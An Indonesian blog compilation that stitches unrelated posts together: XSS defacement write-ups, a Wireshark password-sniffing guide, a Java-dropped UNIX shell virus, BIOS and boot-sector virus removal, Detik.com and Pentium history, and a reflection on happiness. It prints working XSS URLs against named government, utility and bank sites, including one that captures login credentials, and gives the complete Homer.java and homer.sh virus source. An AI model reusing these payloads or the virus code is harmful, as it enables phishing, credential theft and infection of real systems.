Defaced Website and Why

                                                                               1. Website Kabupaten Sidoarjo

TML Injection

Celah pertama yang saya bahas ini pasti sudah sering Anda temui. Target exploitasi celah ini adalah layanan Buku Tamu sidoarjokab.go.id. Saya memasukkan code HTML berupa tag <h1> pada form Buku Tamu:

Injeksi code HTML pada Buku Tamu

Hasilnya, input saya tidak disanitasi sehingga identitas dan komentar saya tampil dalam ukuran heading 1:

Hasil Injeksi code HTML pada Buku Tamu

Saya kemudian mencoba memasukkan code JavaScript pada Buku Tamu:

Injeksi code JavaScript pada Buku Tamu

Dan ternyata, code JavaScript saya dieksekusi:

Hasil Injeksi code JavaScript pada Buku Tamu

Bisa Anda bayangkan jika ada orang jahat yang menanam code JavaScript berbahaya yang dapat mencuri informasi sensitif user (cookies, csrf, etc..) di halaman ini. Dari sini kita bisa melihat adanya 2 celah keamanan pada Buku Tamu:

1. Tidak ada captha untuk melindungi buku tamu dari SPAMMER;
2. Tidak adanya sanitasi input dan output untuk mencegah orang jahat menginjeksikan malicious script;

2. Website PLN

PT. PLN (Persero) Website XSSED by SPYRO-KiD

POC:

1

http://www.pln.co.id/kontak-kami/telusur.php?nokeluhan=%22%20style=%22display:none%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ca%20href=%22http://www.spyrozone.net%22%20target=%22_blank%22%3E%3Cimg%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%20border=%220%22%3E%3C/a%3E%3C/p%3E%3Ciframe%20style=%22display:none%22%3E

//E.O.F

3. Website OSBC

Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.

XSS Pada OCBCNISP-DOT-COM

POC:

Search Engine:

1

http://www.ocbcnisp.com/?opt=search&search=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&x=0&y=0&lang=1

Pencarian ATM:

1

http://www.ocbcnisp.com/?opt=atm&cty=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&lang=2

Hasil:

Bank OCBC NISP Website Vulnerable to XSS

XSS Pada Aplikasi e-Tax

POC:

1

http://etax.ocbcnisp.com/module.asp?module=1&error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E

Hasil:

Isikan username, password & ID organisani, kemudian klik tombol [Login].

Celah XSS Pada Aplikasi e-tax OCBC NISP

Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.

Data korban dikirim ke server lain

Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.

Oleh Spyro.net

Cara memakai Wireshark

Karena ini hanya sebagai latihan atau pembelajaran, maka kita hanya melakukannya pada computer local saja. Jadi pertama-tama buka lah halaman web yang nantinya akan menjadi target sniffing kita. Sebagai contoh halaman admin blog UAD. http://blog.uad.ac.id/latif_ilkom/wp-admin . Isikan dahulu username dan password kita. Jangan di tekan LOGIN dulu

Buka program wireshark.

Pertama masuk pada Capture – Option atau menekan tombol Capture Interfaces

Kemudian akan muncul tampilan window Capture Interfaces. Pilih Option pada Ethernet yang terpakai / yang tersambung dengan jaringan dalam kasus ini, Option pada 802.11 b+g Wireless LAN

Pilih interface (network card) yang akan digunakan untuk mengcapture packet. Pilih salah satu yang benar. Dalam kasus ini saya menggunakan USB Wifi sebagai sambungan ke internet maka yang saya pilih adalah 802.11 b+g.
Dan pastikan Capture packet in promecious dalam status ON.

Untuk menyimpan record yang tercapture, bisa mengaktifkan kolom File, pada bagian Capture File(s).
Pilih tombol Start untuk memulai merecord packet data yang masuk

Pertama-tama mungkin blom ada record yang masuk. Kembali ke halaman admin blog uad, dan tekan lah tombol LOGIN nya. Maka akan ada packet yang terecord

Klik tombol stop ( Alt+E ) setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start. Pasti akan ada banyak sekali packet data yang merecord. Dari sini kita mulai menganalisa packet tersebut. Karena yang kita butuhkan adalah men-sniffing password, maka pada kolom Filter kita ketikkan http untuk lebih memudahkan pengelompokan packet data.

Biasanya login packet terdapat kata login atau sejenisnya. Dalam kasus ini kita menemukan packet dengan informasi POST /latif_ilkom/wp-login.php HTTP/1.1 …. Klik kanan pada packet tersebut, pilih Follow TCP Stream

Maka akan muncul informasi tentang packet data yang kita pilih. Disini lah kita bisa menemukan username dan password dari halaman administrator blog uad. Biasanya ditanda dengan tulisan berwarna merah.

Jika kita bisa menganalisa packet tersebut satu per satu maka kita akan tau data yang kita cari. Dalam kasus ini terlihat bahwa username=latif_ilkom dengan password rahasia sudah kita temukan

Jadi Analisis lagi usernamenya

sumber

Pendiri Detik.com

Hampir semua orang Indonesia yang melek internet kenal dengan Detik.com. Detik.com merupakan portal berita pertama di Indonesia yang didirikan oleh Budiono Darsono dan rekan-rekannya, Yayan Sopyan, Abdul Rahman, serta Didi Nugrahadi. 

Ide untuk mendirikan Detik.com tercetus ketika terjadi krisis politik di tahun 1998. Kala itu, kantor tabloid Detik, tempat dia bekerja, diberangus bersama-sama majalah Tempo dan Editor. Justru pada saat kehilangan pekerjaan dan terjepit, ide kreatif Budiono muncul. Dengan bermodalkan semangat, tape recorder, dan HT (handy talky), Budiono meliput peristiwa-peristiwa seputar unjuk rasa mahasiswa dan pergolakan politik yang memang sedang marak saat itu. Liputan pertama Detik.com adalah tragedi Semanggi 1998.

Pemilihan nama Detik.com terinspirasi karena Budiono memimpikan setiap detik selalu ada berita baru yang harus dipublikasikan. “Mengapa menunggu besok? Detik ini juga," begitulah slogan yang terpampang di blog resmi Budiono. 

Masa-masa awal perjalanan Detik.com banyak menyita waktu dan tenaga Budiono. Setiap waktu harus mencari informasi, wawancara, menulis, dan posting. Sampai-sampai istri dan keluarga terlupakan. Kerja keras dan pengorbanan Budiono berbuah manis, Detik.com tetap eksis hingga saat ini, tidak seperti situs-situs berita lain seperti Satunet, Astaga, Koridor, Mandiri, yang tidak mampu bertahan. Bahkan sekarang Detik.com menjadi situs berita terbesar di tanah Air. (Ciputra)

Sejarah Perkembangan Cache Memory

       Pentium Diluncurkan sekitar awal tahun ’90-an, tahun 1993 tepatnya, Pentium merupakan lompatan besar dalam sejarah prosesor X86 dimana arsitektur prosesor 32-bit mengalami perubahan yang sangat besar. Hal ini menyebabkan kecepatan Pentium ( 80586 atau singkatnya 586 ) secara clock-for-clock dengan prosesor 486 ( generasi sebelumnya ) jauh lebih cepat.

         Dimulai dengan kecepatan 60 Mhz sampai 233 Mhz, prosesor ini telah membuat revolusi baru dalam dunia PC. Pada versi awalnya ( Pentium 60 Mhz ) prosesor ini pernah membuat heboh di kalangan dunia PC karena menurut seorang profesor, prosesor ini telah melakukan kesalahan perhitungan jika dilakukan kombinasi perhitungan perkalian dan pengakaran. Hal ini diakui oleh Intel yang lalu menarik kembali seluruh prosesor Pentium 60 Mhz sekaligus menghapus armada prosesor 60 dan 66 Mhz yang lalu diganti dengan Pentium 75 Mhz.

Di Indonesia, entah di negara lain, penulis mengamati kalau prosesor Pentium yang paling banyak dipakai adalah prosesor Pentium 133 Mhz, mungkin anda pembaca pernah memilikinya ?

Intel membuat chipset Pentium ini mulai dari FX, HX, VX sampai yang mampu mendukung Pentium versi akhir dengan MMX, chipset TX , bentuk pengepakan prosesornya adalah Socket-7.

         Pentium mengalami sedikit perubahan arsitektur seiring dengan perkembangan teknologi dengan diperkenalkannya instruksi multimedia baru yang disebut MMX pada tahun 1994. Meskipun digemborkan oleh Intel kalau prosesor dengan kemampuan ini dapat meningkatkan pengalaman multimedia ( multimedia experience ) sampai 30-50%, tetapi pada kenyataannya kumpulan instruksi ini banyak tidak terpakai oleh para programmer multimedia ( terutama game ). Tetapi instruksi MMX ini merupakan cikal bakal dari instruksi SIMD ( Single Instruction Multiple Data ) yang sejak itu mulai dikembangkan. Instruksi 3DNow! Dari AMD sebagai contoh merupakan penyempurnaan dari instruksi MMX, demikian pula ISSE ( Internet Streaming SIMD Extension ) milik Intel sendiri.

Virus Java

Dibawah ini diterangkan bagaimana cara membuat virus unix menggunakan java sebagai infector,,langakah-langkah sebagai berikut:

share caranye ngebuat virus buat UNIX melalui perantaraan java

---------------------------------------------------------

Code:

---------------------------------------------------------

#!/bin/sh

#-_

echo "Java is safe, and UNIX viruses do not exist."

for file in `find $HOME -type f -print`

do

case "`sed 1q $file`" in

"#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >> $file

esac

done

2>/dev/null

lalu ngebuat java buat infectornya :

Code:

/* Homer.java by Mark D. LaDue */

/* Copyright (c) 1996 Mark D. LaDue

You may study, use, modify, and distribute this example for any purpose.

This example is provided WITHOUT WARRANTY either expressed or implied. */

/* This Java application infects your UNIX system with a Bourne shell

script virus, homer.sh. homer.sh is kind enough to announce itself

and inform you that "Java is safe, and UNIX viruses do not exist"

before finding all of the Bourne shell scripts in your home directory,

checking to see if they've already been infected, and infecting

those that are not. homer.sh infects another Bourne shell script

by simply appending a working copy of itself to the end of that shell

script. */ 

import java.io.*;

class Homer {

public static void main (String[] argv) {

try {

String userHome = System.getProperty("user.home");

String target = "$HOME";

FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh");

String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +

"echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +

"for file in `find " + target + " -type f -print`" + "\n" + "do" +

"\n" + " case \"`sed 1q $file`\" in" + "\n" +

" \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +

" || sed -n '/#-_/,$p' $0 >> $file" + "\n" +

" esac" + "\n" + "done" + "\n" + 

"2>/dev/null";

byte[] buffer = new byte[homer.length()];

homer.getBytes(0, homer.length(), buffer, 0);

outer.write(buffer);

outer.close();

Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +

userHome + "/.homer.sh");

Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +

"/.homer.sh");

} catch (IOException ioe) {}

}

}

Bios virus

Tanda-tanda computer Anda terinfeksi virus BIOS
BIOS virus sangat sulit untuk disingkirkan, tetapi untungnya, mereka sangat langka. Karena BIOS benar-benar terpisah dari hard disk komputer, software anti virus yang normal tidak akan pernah menangkap virus BIOS. Oleh karena itu, jika Anda mengalami perilaku sistem yang hanya dapat disebabkan oleh virus, namun anti virus Anda tetap menyatakan computer dalam keadaan bersih, ada kemungkinan bahwa Anda mungkin memiliki virus dalam BIOS. BIOS akan tetap tidak berubah bahkan jika Anda benar-benar memformat hard disk anda dan menginstal ulang sistem operasi Anda. Yang paling umum dikenal tentang virus BIOS adalah sering membuat pesan peringatan yang mengatakan komputer terinfeksi oleh virus. Pesan ini diikuti dengan pembukaan otomatis browser Web dan pemuatan halaman untuk pemindaian virus palsu dan penghapusan perangkat lunak. Sepertinya, pencipta virus ini hanya mencari keuntungan dengan menipu pengguna komputer memasukkan informasi kartu kredit mereka ke situs ini.


Persiapan menghapus virus BIOS
Sayangnya, menghapus virus BIOS membutuhkan banyak proses. Anda bisa berusaha untuk melakukan ini sendiri jika Anda merasa sudah ahli dengan back up data Anda, menginstal ulang seluruh sistem operasi Anda dan bekerja pada sistem dasar komputer Anda. Semua langkah-langkah ini sangat penting karena akan berdampak langsung pada komputer anda.


Back up Data dan Membuat Boot Disk
Pertama, back-up semua data penting Anda. Cara terbaik untuk melakukan ini adalah untuk menyimpan file Anda di removable drive / flash disk, mentransfer mereka ke hard drive eksternal atau menyimpannya ke sebuah DVD atau CD rewritable. Setelah Anda melakukan semuanya, matikan komputer Anda. Selanjutnya, akses komputer yang terinfeksi untuk terhubung ke Internet. Arahkan ke situs web perusahaan yang memproduksi motherboard atau komputer Anda dan men-download utilitas flash BIOS yang sesuai dari merk motherboard anda. Banyak produsen menyediakan utilitas ini pada situs mereka, tetapi jika Anda mengalami kesulitan, hubungi produsen secara langsung. Setelah Anda telah men-download utilitas flash BIOS, simpanlah ke dalam CD.


Konfigurasi ulang BIOS dan Menginstal ulang OS
Kembali ke komputer yang terinfeksi, pada kasus ini, lepaskan kabel di bagian belakang hard drive. Hal ini tidak perlu dilakukan jika anda ingin menghapus hard drive sepenuhnya. Biarkan terbuka untuk saat ini. Masukkan CD boot dengan utilitas flash BIOS di CD drive dan menyalakan komputer. Anda akhirnya akan melihat halaman setup dengan beberapa pilihan. Pilih opsi yang memungkinkan Anda untuk mengubah urutan boot BIOS. Ketika Anda sampai ke layar berikutnya, mengubah pengaturan sehingga komputer akan boot dari drive CD pertama. Kembali ke menu utama dan pilih pilihan untuk reboot sistem. Tunggu untuk sistem untuk boot sepenuhnya. Gangguan daya pada tahap ini dapat merusak BIOS, jadi usahakan listrik tetap stabil. Setelah utilitas flash BIOS menunjukkan bahwa proses sudah selesai dan meminta untuk reboot atau mematikan komputer, sambungkan kembali hard drive dan reboot komputer secara manual. Ketika reboot komputer, gunakan disk instalasi sistem operasi untuk memformat semua hard drive dan menginstal ulang sistem operasi Anda dari awal. Setelah proses instalasi ulang OS selesai, komputer Anda akan berfungsi normal lagi.


source

How to Remove your Boot Sector Virus

Remove any important files and shut down the infected computer. You can not begin to remove the virus if it is in the RAM in your computer.

Option 1: Take the drive to a pro. UNPLUG the computer, and all monitors, etc. Remove the HDD (hard disk drive or hard drive) from the infected computer. Be sure to remove all of the static electricity from your self by touching the metal case.
Option 2: use software on CD-rom or floppy (yes, can still download as floppy image) to scan the drive and fix the MBR. Start with the O.S. Install CD. Windows Recovery Console option if is Windows.
To change the Boot Order: Enter BIOS via appropriate startup key for your computer. When the BIOS setup page shows, set the CD or Floppy drive to boot first.
Sources of that software: Find out which company manufactures your HDD and see if they have a utility that will do a Low-Level format. This part is important because it deletes everything from your hard drive so that no one can get it back, including the virus. Some common HDD manufacturers' tools for doing this can be found here.
Run the formatting utility provided by your HDD manufacturer.
If have errors booting the O.S., reinstall your Operating System of choice however you want to.
sumber

Kebahagiaan

Apakah kita mengerti arti kebahagiaan ?
pernah merasakan kebahagiaan ?
Kebahagiaan seperti apa ?

Kebahagian didapat jika kita menjaga hati kita agar terbuka bagi orang lain, bagaikan sebuah pintu rumah..
cahaya matahari akan masuk bilamana pintu itu terbuka lebar. 

kebahagiaan datang kepada mereka yg memberikan cintanya secara bebas..

yg tidak meminta orng lain mencintainya lebih dulu.
bermurah hatilah seperti matahari yg memancarkan sinarnya tanpa lebih dahulu bertanya apakah orng2 patut menerima kehangatannya.

untuk bahagia itu sederhana, BERBAHAGIALAH,
jgn menunggu sesuatu yg membuat diri kita bahagia..
mari temukan kebahagiaan di dalam diri kita sendiri.

bahagia katika kita mau membantu orang, berbahagia kita mau menerima orng yg berbeda dgn kita. krn jika semua bunga di taman berwarna putih, taman itu tidak jadi indah.

sudah bahagia ?
Berbahagialah...


(Vincensius Agustinust Gultom♥)